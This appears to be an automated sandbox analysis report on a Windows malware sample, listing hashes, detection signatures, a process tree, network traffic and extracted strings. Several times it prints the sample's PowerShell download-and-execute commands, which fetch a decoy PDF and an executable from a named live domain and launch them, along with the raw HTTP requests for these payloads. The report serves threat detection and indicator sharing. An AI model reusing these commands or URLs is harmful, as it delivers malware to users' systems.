Windows Analysis Report
lg1wwLsmCX.exe

Overview

General Information

Sample name: lg1wwLsmCX.exe (renamed because original name is a hash value)
Original sample name: aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
Analysis ID: 1570132
MD5: 1ceb5d0cb063290c1f66fccfed96a220
SHA1: 09b735e87dd4ef4917d2e1bcd969408c3ac099fd
SHA256: aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
Tags: badlarrysguitars-com, exe, user-JAMESWT_MHT

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Machine Learning detection for sample
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • lg1wwLsmCX.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\lg1wwLsmCX.exe" MD5: 1CEB5D0CB063290C1F66FCCFED96A220)
    • powershell.exe (PID: 7676 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 7924 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 8096 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 6304 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • powershell.exe (PID: 1912 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe") MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 8164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7660, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7676, ProcessName: powershell.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7660, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7676, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lg1wwLsmCX.exe", ParentImage: C:\Users\user\Desktop\lg1wwLsmCX.exe, ParentProcessId: 7660, ParentProcessName: lg1wwLsmCX.exe, ProcessCommandLine: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), ProcessId: 7676, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8164, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: lg1wwLsmCX.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.9:49768 version: TLS 1.2
Source: Binary string: n.pdbbd\ source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000D.00000002.1635091622.00000236BB92E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{3050F24A-98B5-11CF-BB82-00AA00BDCE0B}\LocalServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.1635969714.00000236BB9C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000D.00000002.1635727982.00000236BB983000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-11CF-BB82-00AA00BDCE0B}\InprocServer32 source: powershell.exe, 0000000D.00000002.1629139480.0000022EBA2C7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: powershell.exe, 0000000D.00000002.1635814582.00000236BB989000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: Joe Sandbox View | IP Address: 50.16.47.176
Source: Joe Sandbox View | ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    GET /share/alert.pdf HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: badlarrysguitars.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
    Host: p13n.adobe.io
    Connection: keep-alive
    Accept: */*
    Access-Control-Request-Method: GET
    Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
    Origin: https://rna-resource.acrobat.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Dest: empty
    Referer: https://rna-resource.acrobat.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
    Host: p13n.adobe.io
    Connection: keep-alive
    sec-ch-ua: "Chromium";v="105"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
    Accept: application/json, text/javascript, */*; q=0.01
    x-adobe-uuid: fdf9e666-cbf4-4e86-8c83-d46a601e2046
    x-adobe-uuid-type: visitorId
    x-api-key: AdobeReader9
    sec-ch-ua-platform: "Windows"
    Origin: https://rna-resource.acrobat.com
    Accept-Language: en-US,en;q=0.9
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://rna-resource.acrobat.com/
    Accept-Encoding: gzip, deflate, br
Source: global traffic | HTTP traffic detected:
    GET /private/nois.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: badlarrysguitars.com
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 50.16.47.176 (24 identical entries)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 identical entries)
Source: global traffic | DNS traffic detected: DNS query: badlarrysguitars.com
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000001.00000002.1419880884.0000024F8192E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3AAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://badlarrysguitars.com
Source: lg1wwLsmCX.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: lg1wwLsmCX.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: lg1wwLsmCX.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: lg1wwLsmCX.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000006.00000002.2613139359.000001EC4FA8C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: lg1wwLsmCX.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: lg1wwLsmCX.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: lg1wwLsmCX.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lg1wwLsmCX.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: lg1wwLsmCX.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: lg1wwLsmCX.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: lg1wwLsmCX.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: lg1wwLsmCX.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: lg1wwLsmCX.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lg1wwLsmCX.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.1506355445.0000024FEBE70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coc
Source: 2D85F72862B55C4EADD9E66E06947F3D0.5.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000001.00000002.1419880884.0000024F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA2181000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1419880884.0000024F8169C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3818000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://badlarrysguitars.com
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA3AD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3C09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://badlarrysguitars.com/pri
Source: lg1wwLsmCX.exe | String found in binary or memory: https://badlarrysguitars.com/private/nois.exe
Source: powershell.exe, 0000000D.00000002.1559532601.0000022EA0250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1632473413.0000022EBA4B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1629139480.0000022EBA260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1560571180.0000022EA04E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561049909.0000022EA1C90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(
Source: powershell.exe, 0000000D.00000002.1559532601.0000022EA02D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://badlarrysguitars.com/private/nois.exej
Source: lg1wwLsmCX.exe | String found in binary or memory: https://badlarrysguitars.com/share/alert.pdf
Source: powershell.exe, 00000001.00000002.1501054711.0000024FE9CC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1502637123.0000024FE9F50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(
Source: powershell.exe, 00000001.00000002.1506677308.0000024FEBF5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://badlarrysguitars.com/share/alert.pdfll
Source: powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000006.00000003.1430730460.000001EC4FC00000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 0000000D.00000002.1561850216.0000022EA23B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1419880884.0000024F81193000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1561850216.0000022EA3641000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1504426551.0000024FEBD0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000001.00000002.1493599643.0000024F901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1419880884.0000024F819F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1493599643.0000024F90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB21F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1622100254.0000022EB233A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: ReaderMessages.4.dr | String found in binary or memory: https://www.adobe.co
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF887CF8C0013_2_00007FF887CF8C00
Source: lg1wwLsmCX.exeStatic PE information: invalid certificate
Source: classification engineClassification label: mal52.winEXE@23/63@3/3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftyumdz4.2xi.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\lg1wwLsmCX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\lg1wwLsmCX.exe "C:\Users\user\Desktop\lg1wwLsmCX.exe"
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1596,i,12408767835003218627,8861379469550011944,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\lg1wwLsmCX.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
